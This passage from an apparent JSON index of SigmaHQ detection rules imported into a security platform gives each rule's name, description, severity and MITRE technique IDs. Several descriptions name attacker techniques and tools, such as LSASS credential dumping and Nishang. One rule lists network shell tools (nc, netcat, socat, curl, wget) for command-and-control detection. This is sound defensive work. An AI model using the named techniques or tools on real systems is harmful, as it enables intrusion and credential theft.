"sigmahq-sigma-f69a87ea-955e-4fb4-adb2-bb9fd6685632", "type": "detection", "name": "External Disk Drive Or USB Storage Device Was Recognized By The System", "description": "Detects external disk drives or plugged-in USB devices.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1091", "T1200" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/external-disk-drive-or-usb-storage-device-was-recognized-by-the-system.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f69a87ea-955e-4fb4-adb2-bb9fd6685632", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", 
"imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_external_device.yml" } }, { "id": "sigmahq-sigma-f6c68d5f-e101-4b86-8c84-7d96851fd65c", "type": "detection", "name": "T1047 Wmiprvse Wbemcomn DLL Hijack", "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network for a WMI DLL Hijack scenario.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1047", "T1021.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/t1047-wmiprvse-wbemcomn-dll-hijack.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f6c68d5f-e101-4b86-8c84-7d96851fd65c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_wmiprvse_wbemcomn_dll_hijack.yml" } }, { "id": "sigmahq-sigma-f6d1dd2f-b8ce-40ca-bc23-062efb686b34", "type": "detection", "name": "Script Event Consumer Spawning Process", "description": "Detects a suspicious child process of Script Event Consumer (scrcons.exe).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/script-event-consumer-spawning-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", 
"source_id": "f6d1dd2f-b8ce-40ca-bc23-062efb686b34", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_scrcons_susp_child_process.yml" } }, { "id": "sigmahq-sigma-f6de6525-4509-495a-8a82-1f8b0ed73a00", "type": "detection", "name": "Remote Task Creation via ATSVC Named Pipe", "description": "Detects remote task creation via at.exe or API interacting with ATSVC namedpipe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-task-creation-via-atsvc-named-pipe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f6de6525-4509-495a-8a82-1f8b0ed73a00", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_atsvc_task.yml" } }, { "id": "sigmahq-sigma-f6de9536-0441-4b3f-a646-f4e00f300ffd", "type": "detection", "name": "Weak Encryption Enabled and Kerberoast", "description": "Detects scenario where weak encryption is enabled for a user profile which could be used for hash/password cracking.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/weak-encryption-enabled-and-kerberoast.yaml", "quarantine_reason": 
"imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f6de9536-0441-4b3f-a646-f4e00f300ffd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_alert_enable_weak_encryption.yml" } }, { "id": "sigmahq-sigma-f6ecd1cf-19b8-4488-97f6-00f0924991a3", "type": "detection", "name": "PUA - Nmap/Zenmap Execution", "description": "Detects usage of namp/zenmap. Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1046" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-nmap-zenmap-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f6ecd1cf-19b8-4488-97f6-00f0924991a3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_nmap_zenmap.yml" } }, { "id": "sigmahq-sigma-f7158a64-6204-4d6d-868a-6e6378b467e0", "type": "detection", "name": "Suspicious C2 Activities", "description": "Detects suspicious activities as declared by Florian Roth in its 'Best Practice Auditd Configuration'.\nThis includes the detection of the following commands; wget, curl, base64, nc, netcat, ncat, ssh, socat, wireshark, rawshark, rdesktop, nmap.\nThese commands match a few techniques from the tactics \"Command 
and Control\", including not exhaustively the following; Application Layer Protocol (T1071), Non-Application Layer Protocol (T1095), Data Encoding (T1132)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-c2-activities.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f7158a64-6204-4d6d-868a-6e6378b467e0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/lnx_auditd_susp_c2_commands.yml" } }, { "id": "sigmahq-sigma-f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb", "type": "detection", "name": "Suspicious RDP Redirect Using TSCON", "description": "Detects a suspicious RDP session redirect using tscon.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1563.002", "T1021.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-rdp-redirect-using-tscon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_tscon_rdp_redirect.yml" } }, { "id": 
"sigmahq-sigma-f7375e28-5c14-432f-b8d1-1db26c832df3", "type": "detection", "name": "Potential Arbitrary DLL Load Using Winword", "description": "Detects potential DLL sideloading using the Microsoft Office winword process via the '/l' flag.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-arbitrary-dll-load-using-winword.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f7375e28-5c14-432f-b8d1-1db26c832df3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_office_winword_dll_load.yml" } }, { "id": "sigmahq-sigma-f7385ee2-0e0c-11eb-adc1-0242ac120002", "type": "detection", "name": "Invoke-Obfuscation CLIP+ Launcher - System", "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-clip-launcher-system.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f7385ee2-0e0c-11eb-adc1-0242ac120002", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": 
"2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_clip_services.yml" } }, { "id": "sigmahq-sigma-f742bde7-9528-42e5-bd82-84f51a8387d2", "type": "detection", "name": "Uncommon Microsoft Office Trusted Location Added", "description": "Detects changes to registry keys related to \"Trusted Location\" of Microsoft Office where the path is set to something uncommon. Attackers might add additional trusted locations to avoid macro security restrictions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uncommon-microsoft-office-trusted-location-added.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f742bde7-9528-42e5-bd82-84f51a8387d2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_office_trusted_location_uncommon.yml" } }, { "id": "sigmahq-sigma-f7644214-0eb0-4ace-9455-331ec4c09253", "type": "detection", "name": "Kerberos Manipulation", "description": "Detects failed Kerberos TGT issue operation. 
This can be a sign of manipulations of TGT messages by an attacker.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1212" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/kerberos-manipulation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f7644214-0eb0-4ace-9455-331ec4c09253", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_susp_kerberos_manipulation.yml" } }, { "id": "sigmahq-sigma-f772cee9-b7c2-4cb2-8f07-49870adc02e0", "type": "detection", "name": "Malicious Nishang PowerShell Commandlets", "description": "Detects Commandlet names and arguments from the Nishang exploitation framework", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/malicious-nishang-powershell-commandlets.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f772cee9-b7c2-4cb2-8f07-49870adc02e0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml" } }, { "id": "sigmahq-sigma-f7997770-92c3-4ec9-b112-774c4ef96f96", 
"type": "detection", "name": "Winlogon AllowMultipleTSSessions Enable", "description": "Detects when the 'AllowMultipleTSSessions' value is enabled.\nWhich allows for multiple Remote Desktop connection sessions to be opened at once.\nThis is often used by attacker as a way to connect to an RDP session without disconnecting the other users", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/winlogon-allowmultipletssessions-enable.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f7997770-92c3-4ec9-b112-774c4ef96f96", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_winlogon_allow_multiple_tssessions.yml" } }, { "id": "sigmahq-sigma-f7b5b004-dece-46e4-a4a5-f6fd0e1c6947", "type": "detection", "name": "Privileged Account Creation", "description": "Detects when a new admin is created.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/privileged-account-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f7b5b004-dece-46e4-a4a5-f6fd0e1c6947", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_privileged_account_creation.yml" } }, { "id": "sigmahq-sigma-f7b5f842-a6af-4da5-9e95-e32478f3cd2f", "type": "detection", "name": "MsiExec Web Install", "description": "Detects suspicious msiexec process starts with web addresses as parameter", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.007", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/msiexec-web-install.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f7b5f842-a6af-4da5-9e95-e32478f3cd2f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_msiexec_web_install.yml" } }, { "id": "sigmahq-sigma-f7d7ebd5-a016-46e2-9c54-f9932f2d386d", "type": "detection", "name": "Potential RDP Tunneling Via SSH", "description": "Execution of ssh.exe to perform data exfiltration and tunneling through RDP", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1572" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-rdp-tunneling-via-ssh.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f7d7ebd5-a016-46e2-9c54-f9932f2d386d", "source_commit": "df5c6a6", 
"license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_ssh_rdp_tunneling.yml" } }, { "id": "sigmahq-sigma-f7f9ab88-7557-4a69-b30e-0a8f91b3a0e7", "type": "detection", "name": "Registry Entries For Azorult Malware", "description": "Detects the presence of a registry key created during Azorult execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/registry-entries-for-azorult-malware.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f7f9ab88-7557-4a69-b30e-0a8f91b3a0e7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_event/registry_event_mal_azorult.yml" } }, { "id": "sigmahq-sigma-f8103686-e3e8-46f3-be72-65f7fcb4aa53", "type": "detection", "name": "AWS Console GetSigninToken Potential Abuse", "description": "Detects potentially suspicious events involving \"GetSigninToken\".\nAn adversary using the \"aws_consoler\" tool can leverage this console API to create temporary federated credential that help obfuscate which AWS credential is compromised (the original access key) and enables the adversary to pivot from the AWS CLI to console sessions without the need for MFA using the new access key issued in this request.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.007", "T1550.001" ], "log_source": 
null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-console-getsignintoken-potential-abuse.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f8103686-e3e8-46f3-be72-65f7fcb4aa53", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_console_getsignintoken.yml" } }, { "id": "sigmahq-sigma-f8341cb2-ee25-43fa-a975-d8a5a9714b39", "type": "detection", "name": "BPFtrace Unsafe Option Usage", "description": "Detects the usage of the unsafe bpftrace option", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bpftrace-unsafe-option-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f8341cb2-ee25-43fa-a975-d8a5a9714b39", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_bpftrace_unsafe_option_usage.yml" } }, { "id": "sigmahq-sigma-f8748f2c-89dc-4d95-afb0-5a2dfdbad332", "type": "detection", "name": "SAM Registry Hive Handle Request", "description": "Detects handles requested to SAM registry hive", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1012", "T1552.002" ], 
"log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sam-registry-hive-handle-request.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f8748f2c-89dc-4d95-afb0-5a2dfdbad332", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_sam_registry_hive_handle_request.yml" } }, { "id": "sigmahq-sigma-f88e112a-21aa-44bd-9b01-6ee2a2bbbed1", "type": "detection", "name": "Failed Logon From Public IP", "description": "Detects a failed logon attempt from a public IP. A login from a public IP can indicate a misconfigured firewall or network boundary.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078", "T1190", "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/failed-logon-from-public-ip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f88e112a-21aa-44bd-9b01-6ee2a2bbbed1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/account_management/win_security_susp_failed_logon_source.yml" } }, { "id": "sigmahq-sigma-f8931561-97f5-4c46-907f-0a4a592e47a7", "type": "detection", "name": "CodeIntegrity - Unmet Signing Level Requirements By File Under Validation", "description": "Detects attempted file load events that 
did not meet the signing level requirements. It often means the file's signature is revoked or a signature with the Lifetime Signing EKU has expired.\nThis event is best correlated with EID 3089 to determine the error of the validation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/codeintegrity-unmet-signing-level-requirements-by-file-under-validation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f8931561-97f5-4c46-907f-0a4a592e47a7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/code_integrity/win_codeintegrity_attempted_dll_load.yml" } }, { "id": "sigmahq-sigma-f89b08d0-77ad-4728-817b-9b16c5a69c7a", "type": "detection", "name": "HackTool - SharpImpersonation Execution", "description": "Detects execution of the SharpImpersonation tool. 
Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1134.001", "T1134.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-sharpimpersonation-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f89b08d0-77ad-4728-817b-9b16c5a69c7a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_sharp_impersonation.yml" } }, { "id": "sigmahq-sigma-f8a56cb7-a363-44ed-a82f-5926bb44cd05", "type": "detection", "name": "BITS Transfer Job Download To Potential Suspicious Folder", "description": "Detects new BITS transfer job where the LocalName/Saved file is stored in a potentially suspicious location", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1197" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bits-transfer-job-download-to-potential-suspicious-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f8a56cb7-a363-44ed-a82f-5926bb44cd05", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/builtin/bits_client/win_bits_client_new_trasnfer_susp_local_folder.yml" } }, { "id": "sigmahq-sigma-f8ad2e2c-40b6-4117-84d7-20b89896ab23", "type": "detection", "name": "Suspicious Scan Loop Network", "description": "Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059", "T1018" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-scan-loop-network.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f8ad2e2c-40b6-4117-84d7-20b89896ab23", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_network_scan_loop.yml" } }, { "id": "sigmahq-sigma-f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd", "type": "detection", "name": "Hiding User Account Via SpecialAccounts Registry Key", "description": "Detects modifications to the registry key \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" where the value is set to \"0\" in order to hide user account from being listed on the logon screen.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1564.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/hiding-user-account-via-specialaccounts-registry-key.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_special_accounts.yml" } }, { "id": "sigmahq-sigma-f8be3e82-46a3-4e4e-ada5-8e538ae8b9c9", "type": "detection", "name": "Credential Dumping Activity By Python Based Tool", "description": "Detects LSASS process access for potential credential dumping by a Python-like tool such as LaZagne or Pypykatz.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/credential-dumping-activity-by-python-based-tool.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f8be3e82-46a3-4e4e-ada5-8e538ae8b9c9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_access/proc_access_win_lsass_python_based_tool.yml" } }, { "id": "sigmahq-sigma-f8c1e80b-c73a-476a-ae24-6c72528b1521", "type": "detection", "name": "DNS Query To Common Malware Hosting and Shortener Services", "description": "Detects DNS queries to domains commonly used by threat actors to host malware payloads or redirect through URL shorteners.\nThese include platforms like Cloudflare Workers, TryCloudflare, InfinityFree, and URL shorteners such as tinyurl and lihi.cc.\nSuch DNS activity can indicate potential delivery 
or command-and-control communication attempts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dns-query-to-common-malware-hosting-and-shortener-services.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f8c1e80b-c73a-476a-ae24-6c72528b1521", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/dns_query/dns_query_win_common_malware_hosting_services.yml" } }, { "id": "sigmahq-sigma-f8d6a15e-4bc8-4c27-8e5d-2b10f0b73e5b", "type": "detection", "name": "Suspicious Powercfg Execution To Change Lock Screen Timeout", "description": "Detects suspicious execution of 'Powercfg.exe' to change lock screen timeout", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-powercfg-execution-to-change-lock-screen-timeout.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f8d6a15e-4bc8-4c27-8e5d-2b10f0b73e5b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powercfg_execution.yml" } }, { "id": 
